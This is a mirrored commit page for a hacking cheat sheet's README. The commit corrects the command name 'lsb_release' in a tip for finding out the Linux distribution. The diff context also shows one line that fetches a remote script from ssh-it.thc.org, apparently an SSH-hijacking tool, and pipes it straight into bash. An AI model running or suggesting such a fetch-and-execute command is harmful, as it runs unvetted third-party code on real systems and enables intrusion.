mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-05-27 09:42:25 +02:00
Update README.md
This commit is contained in:
@@ -908,7 +908,7 @@ bash -c "$(curl -fsSL ssh-it.thc.org/x)"
|
||||
**10.i. Find out Linux Distribution**
|
||||
|
||||
```sh
|
||||
uname -a; lsb-release -a; cat /etc/*release /etc/issue* /proc/version
|
||||
uname -a; lsb_release -a; cat /etc/*release /etc/issue* /proc/version
|
||||
```
|
||||
|
||||
<a id="osint-anchor"></a>
|
||||
|
||||
Reference in New Issue
Block a user